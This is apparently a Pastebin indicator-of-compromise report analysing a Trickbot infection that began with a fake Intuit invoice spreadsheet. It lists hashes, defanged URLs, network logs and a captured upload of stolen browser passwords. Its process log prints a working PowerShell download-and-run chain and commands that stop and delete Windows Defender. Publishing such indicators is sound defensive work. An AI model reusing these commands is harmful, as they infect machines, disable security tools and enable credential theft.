SHARE
TWEET

#trickbot_240918

VRad Sep 24th, 2018 357 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Trickbot #X97M #macro
  2.  
  3. https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/
  4.  
  5. email_headers
  6. --------------
  7. Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
  8.     by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
  9.     for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
  10.     (envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
  11. Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
  12. Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
  13. Subject:  FW: Invoice #3989021
  14. From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>
  15.  
  16. files
  17. --------------
  18.  
  19. SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
  20. File name   Invoice3989021.xls
  21. File size   56.5 KB
  22.  
  23. SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
  24. File name   Client dll for Pim Index Maintenance
  25. File size   361 KB
  26.  
  27. h11p: \eaucardinal{.} com/perfo.rmance
  28. h11p: \abogadodetexas{.} com/perfo.rmance
  29.  
  30. activity
  31. -------------
  32.  
  33. proc
  34. --------------
  35. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
  36. cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
  37. powershell  "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
  38. cmd /c ""C:\tmp\parser.bat" "
  39. powershell  "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
  40. "C:\tmp\very.exe"
  41. C:\Windows\SysWOW64\cmd.exe
  42. sc  stop WinDefend
  43. sc  delete WinDefend
  44. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  45. powershell  Set-MpPreference -DisableRealtimeMonitoring $true
  46. C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
  47. C:\Windows\SysWOW64\cmd.exe
  48. sc  stop WinDefend
  49. sc  delete WinDefend
  50. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  51. C:\Windows\system32\svchost.exe
  52. svchost.exe
  53. svchost.exe
  54. :\Windows\system32\svchost.exe -k netsvcs
  55. C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
  56. C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
  57. C:\Windows\SysWOW64\cmd.exe
  58. /c sc stop WinDefend
  59. sc  delete WinDefend
  60. C:\Windows\SysWOW64\cmd.exe
  61. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  62. C:\Windows\system32\svchost.exe
  63.  
  64. persist
  65. --------------
  66. \Msntcs Client dll for Pim Index Maintenance   
  67. Client dll for Pim Index Maintenance   
  68. c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16
  69.  
  70. netwrk
  71. --------------
  72. 198.50.100.170  eaucardinal{.} com  GET /perfo.rmance HTTP/1.1      301
  73. 198.50.100.170  www.eaucardinal{.} com  GET /perfo.rmance HTTP/1.1  404
  74. 23.229.233.135  abogadodetexas{.} com   GET /perfo.rmance HTTP/1.1  200     !This program cannot be run in DOS mode.   
  75.  
  76. 52.1.46.34  checkip.amazonaws.com   GET / HTTP/1.1  Mozilla/5.0 (Windows NT 10.0; Win64; x64)   200 Public IP
  77.  
  78. 138.34.45.133   138.34.45.133   POST /ser0924/APM11_W617601.id/81/ HTTP/1.1     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
  79. 138.34.45.133   138.34.45.133   POST /ser0924/APM11_W617601.id/81/ HTTP/1.1     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
  80.  
  81. POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
  82. Accept: */*
  83. User-Agent: Mozilla/4.0
  84. Host: 138.34.45.133
  85.  
  86. -----------NZYIBXEQQVBQBMZW
  87. Content-Disposition: form-data; name="data"
  88.  
  89. http://www.i.ua|oper|********(saved passwd)
  90. https://www.ukr.net|11oper|********(saved passwd)
  91. https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
  92. https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)
  93.  
  94. -----------NZYIBXEQQVBQBMZW
  95. Content-Disposition: form-data; name="source"
  96.  
  97. firefox passwords
  98. -----------NZYIBXEQ
  99.  
  100. powershell.exe  2336    TCP 10.0.2.15   49693   198.50.100.170  80  ESTABLISHED
  101. powershell.exe  2336    TCP 10.0.2.15   49694   198.50.100.170  80  ESTABLISHED
  102. powershell.exe  2336    TCP 10.0.2.15   49695   23.229.233.135  80  ESTABLISHED
  103.  
  104.  
  105. svchost.exe 2540    TCP 10.0.2.15   49696   216.239.32.21   80  ESTABLISHED
  106. svchost.exe 2540    TCP 10.0.2.15   49697   216.239.32.21   443 ESTABLISHED
  107. svchost.exe 2540    TCP 10.0.2.15   49698   107.181.174.176 443 SYN_SENT
  108.  
  109.  
  110. svchost.exe 2540    TCP apm11   49696   any-in-2015.1e100.net   http    ESTABLISHED
  111. svchost.exe 2540    TCP apm11   49697   any-in-2015.1e100.net   https   ESTABLISHED
  112. svchost.exe 2540    TCP apm11   49699   vds5605.example.com https   SYN_SENT
  113.  
  114. # # #
  115. https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
  116. https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
  117. https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top